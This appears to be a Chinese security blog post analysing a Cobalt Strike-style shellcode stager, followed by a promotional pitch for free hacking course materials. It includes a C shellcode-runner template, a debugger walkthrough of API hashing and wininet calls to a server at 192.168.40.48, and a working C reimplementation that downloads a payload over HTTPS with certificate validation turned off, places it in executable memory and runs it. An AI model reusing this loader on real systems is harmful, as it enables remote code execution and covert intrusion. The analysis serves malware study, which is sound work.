文章详细描述了一段C代码如何模拟shellcode执行,涉及从InternetOpenUrlA到VirtualAlloc等网络操作,同时提及了网络安全学习的相关资源,包括学习路线图和视频教程。
0x00 分析样本
#include<stdio.h>#include<Windows.h>#pragma comment(linker, "/section:.data,RWE")unsigned char buf[] = "shellcode";int main(){//反调试不是很强的可以用来定位入口点printf("hell word!!\r\n");__asm{mov eax, offset bufjmp eax}}
0x01 分析过程
shellcode入口,开始进行调试
进入0X00D1983F函数,,找到函数后循环都会经过这里push了wininet字符串和0x726774C
进入ebp的call分析
第一次拿的是本身exe
第二次拿的是ntdll.dll
然后拿到ntdll.dll的导出表地址
导出函数个数
然后进行遍历
与0x0726774c进行比较,看是否是需要的函数
最后遍历出来找的是LoadLibrary地址,通过LoadLibrary调用起了wininet.dll
然后遍历拿到 InternetOpenUrlA,并实现调用
再次拿到 InternetConnectA并实现调用,访问ip为“192.168.40.48”
再次拿到HttpOpenRequestA并实现调用网页路径为“/MKMw”
再次拿到InternetSetOptionA并实现调用
再次拿到HttpSendRequestA并实现调用
拿到GetDialogBaseUnits,与上面同理
拿到GetDesktopWindow,与上面同理
拿到InternetFindNextFileA,与上面同理
拿到InternetErrorDlg,与上面同理
拿到VirtualAlloc,与上面同理
拿到InternetReadFile,这是循环在读取
然后放开就直接运行
cs上线
0x02 代码模拟
char* HttpsGet(const char* szURL, const int port, int nSize, char *UA){URL_COMPONENTSA crackedURL = { 0 };char szHostName[128];char szUrlPath[256];crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);crackedURL.lpszHostName = szHostName;crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);crackedURL.lpszUrlPath = szUrlPath;crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);InternetCrackUrlA(szURL, (DWORD)strlen(szURL), 0, &crackedURL);// Start of the internet sessionHINTERNET hInternet = InternetOpenA(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);// HTTPS versionHINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);DWORD dwFlags;DWORD dwBuffLen = sizeof(dwFlags);BOOL bRet = InternetQueryOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, (LPVOID)&dwFlags, &dwBuffLen);if (!bRet) {printf("Failed to query internet options. Error: %d", GetLastError());return NULL;}dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;bRet = InternetSetOptionA(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));if (!bRet) {printf("Failed to set internet options. Error: %d", GetLastError());return NULL;}// Send HTTP requestHttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);LPVOID p = VirtualAlloc(NULL, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);DWORD dwRealWord;for (int i = 0; i < 32; i++) {BOOL response = InternetReadFile(hHttpRequest, (LPVOID)((int)p + i * 0x2000), 0x2000, &dwRealWord);}InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);InternetCloseHandle(hInternet);((void(WINAPI*)(void))p)();return NULL;}
c代码简单模拟,shellcode请求并上线
0x03 成果
`黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
(都打包成一块的了,不能一一展开,总共300多集)
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取